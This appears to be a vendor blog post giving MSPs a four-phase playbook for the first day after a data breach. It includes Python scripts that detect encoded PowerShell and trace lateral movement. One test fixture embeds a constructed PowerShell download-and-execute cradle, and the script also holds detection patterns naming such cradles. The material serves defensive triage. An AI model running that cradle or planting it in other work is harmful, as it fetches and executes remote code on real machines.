The First 24 Hours After a Data Breach: MSP Response Playbook


Key takeaways

  • Contain threats immediately: Isolate affected endpoints, restrict access to systems and applications, and revoke unnecessary third-party access to limit further damage.
  • Investigate the breach thoroughly: Identify the attack type, entry point, affected assets, and scope of data exposure to determine root cause and next steps.
  • Communicate with transparency: Coordinate with internal stakeholders and provide customers with clear, timely updates that meet legal and compliance requirements.
  • Focus on remediation and recovery: Patch vulnerabilities, reset credentials, restore systems from trusted backups, and document all actions taken.

It happened. 

Attackers successfully breached one of your client’s critical assets and infrastructure.  

Time seems to stand still. 

The C-level is in a panicked frenzy. The security team is in chaos mode. Angry emails from customers are flooding your inbox. Legal and PR teams are scrambling to draft statements that won’t further damage the brand. And you, the trusted MSP, are expected to have answers and an immediate action plan.

Breathe. You’re not alone. A recent survey found that 76% of MSPs spotted a cyberattack on their infrastructure within the last 12 months. Every passing minute post-breach is precious.  

We’re going to help guide you through the different phases of a breach, including the proactive steps you can take to ensure business continuity and regain trust with your customers. 

Phase 1: Immediate Threat Containment 

According to IBM, organizations take an average of 204 days to identify a data breach and 73 days to contain it. Identification has already happened here, so the focus is containment, and the window before the attacker resumes their activity is short. Regardless of organization size, begin at the endpoints: isolate affected devices from the corporate network (EDR network isolation, or a firewall policy that permits only the management channel) rather than powering them off, so that memory, running processes and active connections remain available to the investigation. Fully disconnecting a device is still the right call when the risk is severe, for example when ransomware is actively encrypting files.

On a compromised device, an attacker might run PowerShell with obfuscated or encoded commands, modify sensitive files, dump credentials from memory (which later surface for sale on the dark web), or move laterally within the network to escalate privileges and gain deeper access to critical infrastructure. None of those options are good. 
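The encoded-PowerShell case above is worth knowing how to spot in process-creation telemetry, because `-EncodedCommand` takes base64 of the script in UTF-16LE (not UTF-8), and a quick manual decode often fails for that reason. The script below is an added example, not code from the original post or from Guardz: it parses constructed Sysmon ID 1 / Windows 4688-style events (hypothetical hosts, users and staging URL), decodes the payload, and scores each event on the indicators a responder looks for first (encoded payload, download cradle, hidden window, profile and policy flags, an Office or script-host parent).

```python
"""Triage PowerShell process-creation events for encoded or obfuscated commands."""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed stager used to build the sample event: -EncodedCommand expects
# base64 of the script encoded as UTF-16LE, which is the detail most ad-hoc
# decoders get wrong.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
STAGER_B64 = base64.b64encode(STAGER.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (hypothetical hosts/users), flattened to
# key=value pairs the way a SIEM export might present Sysmon ID 1 / Windows 4688.
SAMPLE_EVENTS = [
    'ts=2025-03-04T09:12:41Z host=WS-017 user=CORP\\jdoe parent=WINWORD.EXE '
    f'image=powershell.exe cmd="powershell.exe -nop -w hidden -enc {STAGER_B64}"',
    'ts=2025-03-04T09:13:05Z host=WS-017 user=CORP\\jdoe parent=powershell.exe '
    'image=cmd.exe cmd="cmd.exe /c whoami /all"',
    'ts=2025-03-04T02:00:03Z host=SRV-FS01 user=CORP\\svc_backup parent=services.exe '
    'image=powershell.exe cmd="powershell.exe -NoProfile -File C:\\ops\\nightly-backup.ps1"',
    'ts=2025-03-04T09:20:17Z host=WS-017 user=CORP\\jdoe parent=explorer.exe '
    'image=powershell.exe cmd="powershell.exe -ep bypass -c Get-Process"',
]

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
# -e, -ec, -en, -enc and the full -EncodedCommand are the abbreviations seen in the wild.
ENC_RE = re.compile(r'(?i)(?<!\S)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)')
CRADLE_RE = re.compile(r'(?i)\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|'
                       r'Net\.WebClient|Invoke-WebRequest|FromBase64String)\b')
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
RISKY_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    score: int
    severity: str
    indicators: list = field(default_factory=list)
    decoded: Optional[str] = None


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict; quoted values keep their spaces."""
    ev = {}
    for key, val in KV_RE.findall(line):
        ev[key] = val[1:-1] if val.startswith('"') and val.endswith('"') else val
    return ev


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decoded -EncodedCommand script, a marker if it will not decode, or None if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:  # binascii.Error and UnicodeDecodeError are both ValueError subclasses
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:
        return "<undecodable:" + m.group(1)[:24] + ">"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(ev: dict) -> Finding:
    """Score one event; weights are a starting point to tune per environment."""
    cmd = ev.get("cmd", "")
    indicators, score, decoded = [], 0, None
    if _basename(ev.get("image", "")) in SCRIPT_HOSTS:
        decoded = decode_encoded_command(cmd)
        checks = [
            ("encoded_command", decoded is not None, 2),
            ("download_cradle", bool(CRADLE_RE.search(cmd + " " + (decoded or ""))), 2),
            ("hidden_window", bool(re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmd)), 1),
            ("no_profile", bool(re.search(r"(?i)(?<!\S)-nop(?:rofile)?\b", cmd)), 1),
            ("policy_bypass", bool(re.search(r"(?i)-e(?:p|xecutionpolicy)\s+bypass", cmd)), 1),
        ]
        for name, hit, weight in checks:
            if hit:
                indicators.append(name)
                score += weight
    parent = _basename(ev.get("parent", ""))
    if parent in RISKY_PARENTS:  # Office/script hosts should not be spawning shells
        indicators.append("risky_parent:" + parent)
        score += 2
    severity = "high" if score >= 5 else "medium" if score >= 3 else "low" if score else "none"
    return Finding(ev.get("ts", ""), ev.get("host", ""), ev.get("user", ""),
                   score, severity, indicators, decoded)


def flag_suspicious(lines, min_score: int = 3) -> list:
    """Findings at or above min_score, highest score first."""
    findings = [triage_event(parse_event(line)) for line in lines]
    return sorted((f for f in findings if f.score >= min_score), key=lambda f: -f.score)


if __name__ == "__main__":
    for f in flag_suspicious(SAMPLE_EVENTS):
        print(f.ts, f.host, f.user, f.severity, f.indicators)
        print("  decoded:", f.decoded)
```

The nightly backup job in the sample scores only on `-NoProfile` and stays below the reporting threshold, which is the point of scoring rather than matching a single flag; raise or lower `min_score` and the weights to fit the client's normal administrative activity.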

And speaking of access, that is the next item on the containment list. Access to cloud environments, productivity apps such as Monday and Slack, and corporate inboxes should be restricted immediately until credentials have been reset. Note that resetting a password does not end sessions that are already open: revoke active sessions, refresh tokens and API keys for the affected identities as well, or the attacker keeps their access under the old credentials. 

Third parties pose a great risk, especially if they are still logged into corporate systems, shared cloud environments, or retain access to accounts. A study showed that unauthorized network access accounted for over 50% of publicly disclosed third-party breaches in 2024. 

In a breach, all third parties should be thoroughly reassessed to ensure that they are under contract or employed by the organization before any access may be granted to them. Any accounts or access privileges belonging to third parties no longer contracted with the organization should be immediately revoked. 

Take no chances here. When in doubt, restrict access. 

Phase 2: Assessing the Breach 

The next phase is to assess the attack. Take a step back and begin by asking questions. Here are a handful of questions an MSP must consider during this phase. 

  • What type of attack was it? (ransomware, phishing, etc.)
  • How did the attacker initially gain access? 
  • When was the threat properly identified?
  • How did the attacker bypass our existing security measures? 
  • Which endpoint was the initial point of compromise (if an endpoint was involved)?
  • What was the volume and class of data exfiltrated? 
  • Was it a former employee who still had access to the corporate network?
  • Did we miss any warning signs in the logs? 
  • Was the attack confined to specific departments?
  • How many customers were impacted by the breach? 
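Several of these questions (initial point of compromise, lateral movement, which departments were touched, and the earliest attacker activity that any trusted backup must predate) can be answered from logon telemetry. The script below is an added example, not part of the original post or of Guardz's product: it runs over constructed Windows 4624-style logon records and a hypothetical host inventory, flags an account that fans out to many hosts in a short window, reconstructs its hop chain, and reports the blast radius from a given compromise time.

```python
"""Reconstruct lateral movement and blast radius from logon telemetry."""
import csv
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from io import StringIO

# Hypothetical host inventory (constructed for the example) used to resolve
# source IPs to hostnames and hosts to the business unit that owns them.
INVENTORY = {
    "WS-017":    {"ip": "10.1.20.17", "dept": "Finance"},
    "WS-022":    {"ip": "10.1.20.22", "dept": "Sales"},
    "SRV-FS01":  {"ip": "10.1.5.11",  "dept": "IT"},
    "SRV-SQL01": {"ip": "10.1.5.12",  "dept": "IT"},
    "DC01":      {"ip": "10.1.5.1",   "dept": "IT"},
    "SRV-HR01":  {"ip": "10.1.5.30",  "dept": "HR"},
    "SRV-APP01": {"ip": "10.1.5.20",  "dept": "IT"},
    "SRV-CI01":  {"ip": "10.1.5.40",  "dept": "IT"},
}
IP_TO_HOST = {v["ip"]: k for k, v in INVENTORY.items()}

# Constructed logon records in the shape of Windows Security event 4624 fields.
# Logon type 2 = console, 3 = network (SMB, WMI, ...), 10 = RemoteInteractive (RDP).
LOGON_CSV = """ts,host,user,logon_type,src_ip
2025-03-04T02:00:01Z,SRV-FS01,CORP\\svc_backup,3,10.1.5.9
2025-03-04T03:00:00Z,SRV-APP01,CORP\\svc_deploy,3,10.1.5.40
2025-03-04T08:55:12Z,WS-022,CORP\\asmith,2,-
2025-03-04T09:12:30Z,WS-017,CORP\\jdoe,2,-
2025-03-04T09:31:02Z,SRV-FS01,CORP\\svc_deploy,3,10.1.20.17
2025-03-04T09:33:47Z,SRV-SQL01,CORP\\svc_deploy,3,10.1.20.17
2025-03-04T09:40:15Z,DC01,CORP\\svc_deploy,10,10.1.20.17
2025-03-04T09:52:09Z,SRV-HR01,CORP\\svc_deploy,3,10.1.5.12
"""

REMOTE_LOGON_TYPES = {"3", "10"}


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def load_events(text: str) -> list:
    """Parse CSV logon records and return them ordered by time."""
    rows = []
    for r in csv.DictReader(StringIO(text)):
        r["ts"] = parse_ts(r["ts"])
        rows.append(r)
    return sorted(rows, key=lambda r: r["ts"])


def fan_out(events, window=timedelta(minutes=30), min_hosts=3) -> dict:
    """Accounts that reach >= min_hosts distinct hosts over the network within `window`.
    A service account touching four servers in twenty minutes from a workstation is
    the classic lateral-movement signature."""
    by_user = defaultdict(list)
    for e in events:
        if e["logon_type"] in REMOTE_LOGON_TYPES:
            by_user[e["user"]].append(e)
    flagged = {}
    for user, evs in by_user.items():
        for i, start in enumerate(evs):
            hosts = {x["host"] for x in evs[i:] if x["ts"] - start["ts"] <= window}
            if len(hosts) >= min_hosts:
                flagged[user] = sorted(hosts)
                break
    return flagged


def movement_chain(events, user: str) -> list:
    """Ordered (ts, source host, destination host) hops for one account."""
    return [
        (e["ts"], IP_TO_HOST.get(e["src_ip"], e["src_ip"]), e["host"])
        for e in events
        if e["user"] == user and e["logon_type"] in REMOTE_LOGON_TYPES
    ]


def blast_radius(events, user: str, since_iso: str) -> dict:
    """Scope of one account's remote activity after the suspected compromise time."""
    since = parse_ts(since_iso)
    hops = [h for h in movement_chain(events, user) if h[0] >= since]
    hosts = sorted({dst for _, _, dst in hops})
    return {
        "entry_point": hops[0][1] if hops else None,   # where the first hop came from
        "first_seen": hops[0][0] if hops else None,    # backups must predate this
        "hosts": hosts,
        "departments": sorted({INVENTORY[h]["dept"] for h in hosts if h in INVENTORY}),
        "hops": hops,
    }


if __name__ == "__main__":
    evs = load_events(LOGON_CSV)
    for user, hosts in fan_out(evs).items():
        print("fan-out:", user, hosts)
        scope = blast_radius(evs, user, "2025-03-04T09:12:30Z")
        print("entry point:", scope["entry_point"], "first seen:", scope["first_seen"])
        for ts, src, dst in scope["hops"]:
            print(" ", ts.strftime("%H:%M:%S"), src, "->", dst)
        print("departments touched:", scope["departments"])
```

In the sample, the account's 03:00 logon from the CI server is its normal baseline and is kept in the chain so the reader can see it; passing the console logon on WS-017 as the compromise time separates the attacker's hops from that baseline. The last hop (SRV-SQL01 to SRV-HR01) shows why the chain matters: the HR server was reached from a server the attacker had already taken, not from the original workstation.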

Once the dots have been connected and conclusions drawn, an entire security reassessment and incident response strategy must be underway. 

Access controls must be strengthened. Privileges limited. Third-party account access temporarily restricted. Security tool effectiveness reevaluated. Employee security awareness increased.    

So much to do. So little time. 

Make sure you brew a few pots of coffee or have access to a good Nespresso machine because you will spend every minute tracing back the root cause of the attack. It’s an intense, detailed process that demands focus, but has to be done.

Phase 3: Internal and External Communication 

Now comes the part no one enjoys: disclosing the breach. As you can imagine, delivering the bad news brings plenty of setbacks and challenges beyond the TechCrunch headlines. 

A meeting must be set up with all internal stakeholders to ensure alignment. This includes the C-suite, IT, legal, PR, and customer support (they have to deal with a digital storm of angry complaints).  

Communication is exceptionally time-sensitive here, particularly with customers. Transparency is key. A carefully crafted message detailing the breach and its impact should be developed with a PR firm that has handled security incidents before; they are also instrumental in protecting brand reputation. 

The email should be sent out only after consulting with legal and compliance teams to ensure all regulatory requirements are met. The last surprise you need is an unexpected regulatory fine in your inbox. More importantly, the email should provide clear guidance on the next steps for affected parties, reassuring them that corrective actions are being taken. 

This step can mean the difference between customer loyalty and attrition. A study showed that 65% of data breach victims lost trust in an organization after a data breach.

Choose each word carefully. 

Phase 4: Remediation and Recovery 

The final step post-breach is remediation. That might involve patching vulnerabilities that have been exploited, resetting passwords, reconfiguring access controls, and restoring systems. This process may take longer, depending on the scope of the breach.  

Data backup and recovery are critical. Restore any databases or file systems that were corrupted during the attack, but only from backups taken before the earliest attacker activity established in the investigation, and check them for the persistence mechanisms found there before they go back online. If the compromised systems cannot be safely restored, the best bet is to wipe the affected machines and reinstall the operating system from trusted sources. 

Compliance is another topic.   

Regulatory fines might be looming on the horizon, once again depending on the scope of the breach and the impact on customer data privacy. Under GDPR, a personal data breach must be reported to the supervisory authority within 72 hours of becoming aware of it, and affected individuals must be informed without undue delay when the breach is likely to result in a high risk to them. Make sure you have everything documented. Be transparent. 

There are many security measures you can implement to prevent a breach or minimize its blast radius, but one thing every MSP must have is cyber insurance, especially for moments like this. Liability is an expensive matter. 

Why put yourself or your clients through that risk? 

Unified MDR + EDR Protection with Guardz

A data breach can happen in seconds, but with the right security controls, it doesn’t have to become a disaster.

Guardz equips MSPs with a fully managed 24/7 MDR service and industry-leading EDR powered by SentinelOne, all built into a unified platform designed specifically for the needs of SMBs. When attacks happen, Guardz delivers real-time detection, rapid response, and expert-led containment so you don’t have to face it alone.

Our platform goes beyond alerting. It proactively hunts threats, automates endpoint isolation, and gives your team the visibility and control they need to stop attacks fast. Whether it’s ransomware, credential theft, or lateral movement, Guardz ensures your clients stay protected and your reputation stays intact.

Every second counts during a breach. Guardz helps you act faster, smarter, and with confidence.

Frequently Asked Questions

The immediate priority is containment: isolating affected systems and restricting attacker access before additional damage occurs.

  • Disconnect compromised endpoints from the network.
  • Disable or reset potentially compromised accounts.
  • Revoke unnecessary third-party and vendor access.
  • Preserve logs and forensic evidence before making major changes.


Clear and timely communication helps maintain trust, supports regulatory compliance, and prevents confusion among stakeholders and affected customers.

  • Align executive, IT, legal, PR, and support teams quickly.
  • Create consistent internal and external messaging.
  • Communicate known facts without speculation.
  • Provide customers with practical next steps and updates.


Effective root-cause analysis requires tracing the attack path, identifying initial access methods, and understanding how existing defenses were bypassed.

  • Review endpoint, identity, cloud, and network logs.
  • Investigate privilege escalation and lateral movement activity.
  • Analyze compromised accounts and third-party access paths.
  • Document findings to improve future detection and prevention.


Recovery should focus on eliminating persistence mechanisms and strengthening security controls that failed during the initial attack.

  • Patch exploited vulnerabilities immediately.
  • Rebuild compromised systems from trusted sources when necessary.
  • Rotate credentials and enforce MFA across critical systems.
  • Review access controls and remove excessive permissions.


Guardz combines MDR and EDR capabilities to rapidly detect, investigate, and contain threats before they spread across client environments.

  • Automate endpoint isolation during active incidents.
  • Detect ransomware, credential theft, and lateral movement activity.
  • Provide 24/7 expert-led monitoring and response.
  • Accelerate containment decisions with actionable intelligence.

